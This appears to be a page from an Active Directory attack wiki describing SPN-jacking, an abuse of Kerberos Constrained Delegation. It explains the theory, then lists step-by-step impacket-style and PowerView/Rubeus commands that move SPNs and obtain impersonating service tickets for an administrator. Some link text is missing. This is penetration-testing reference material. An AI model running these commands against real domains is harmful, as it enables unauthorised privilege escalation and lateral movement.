SPN-jacking

PrevioussAMAccountName spoofing NextDACL abuse

Last updated 1 year ago

Was this helpful?

SPN-jacking

Theory

This attack combines and DACL abuse. A service configured for Kerberos Constrained Delegation (KCD) can impersonate users on a set of services. The "set of services" is specified in the constrained delegation configuration. It is a list of SPNs (Service Principal Names) written in the msDS-AllowedToDelegateTo attribute of the KCD service's object.

In standard KCD abuse scenarios, an attacker that gains control over a "KCD service" can operate lateral movement and obtain access to the other services/SPNs. Since KCD allows for impersonation, the attacker can also impersonate users (e.g. domain admins) on the target services. Depending on the SPNs, or if it's possible to , the attacker could also gain admin access to the server the "listed SPN" belongs to.

On top of all that, if attacker is able to move a "listed SPN" from the original object to the another one, he could be able to compromise it. This is called SPN-jacking and it was intially discovered and explaine by in .

In order to "move the SPN", the attacker must have the right to edit the target object's ServicePrincipalName attribute (i.e. GenericAll, GenericWrite over the object orWriteProperty over the attribute (called WriteSPN ), etc.).
If the "listed SPN" already belongs to an object, it must be removed from it first. This would require the same privileges (GenericAll, GenericWrite, etc.) over the SPN owner as well (a.k.a. "Live SPN-jacking"). Else, the SPN can be simply be added to the target object (a.k.a. "Ghost SPN-jacking").

Practice

In this scenario, we assume the Kerberos Constrained Delegation is configured in order to keep things simple. However, the SPN-jacking attack can be conducted on as well (cf. ).

In this scenario (following 's ):

serverA is configured for KCD
serverB's SPN is listed in serverA's KCD configuration
serverC is the final target
attacker controls serverA, has at least WriteSPN over serverB (if needed, "live SPN-jacking"), and at least WriteSPN over serverC.

From UNIX-like machines, 's and example scripts (Python) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).

At the time of writing, 12th Feb. 2022, adding the tgssub.py is pending. modifying the findDelegation.py is pending.

At the time of writing, 12th Feb. 2022, this technique has not been fully fool-proofed from UNIX systems. In case something errors, switch to the Windows technique.

# 1. show SPNs listed in the KCD configuration
findDelegation.py -user 'serverA$' "DOMAIN"/"USER":"PASSWORD"

# 2. remove SPN from ServerB if required (live SPN-jacking)
addspn.py --clear -t 'ServerB$' -u 'domain\user' -p 'password' 'DomainController.domain.local'

# 3. add SPN to serverC
addspn.py -t 'ServerC$' --spn "cifs/serverB" -u 'domain\user' -p 'password' -c 'DomainController.domain.local'

# 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy
getST -spn "cifs/serverB" -impersonate "administrator" 'domain/serverA$:password'

# 5. Edit the ticket's SPN (service class and/or hostname)
tgssub.py -in serverB.ccache -out newticket.ccache -altservice "cifs/serverC"

Once the final service ticket is obtained, it can be used with / to access the target.

From Windows machines, (PowerShell) and (C#) can be used to conduct the different steps (manipulate SPNs, obtain and manipulate tickets).

# 1. show SPNs listed in the KCD configuration
Get-DomainObject -Identity ServerA$ -Properties 'msDS-AllowedToDelegateTo'

# 2. remove SPN from ServerB if required (live SPN-jacking)
Set-DomainObject -Identity ServerB$ -Clear 'ServicePrincipalName'

# 3. add SPN to serverC
Set-DomainObject -Identity ServerC$ -Set @{ServicePrincipalName='cifS/serverB'}

# 4. request an impersonating service ticket for the SPN through S4U2self + S4U2proxy
Rubeus.exe s4u /nowrap /msdsspn:"cifs/serverB" /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password"

# 5. Edit the ticket's SPN (service class and/or hostname)
Rubeus.exe tgssub /nowrap /altservice:"host/serverC" /ticket:"ba64ticket"

Once the final service ticket is obtained, it can be used with to access the target.

Resources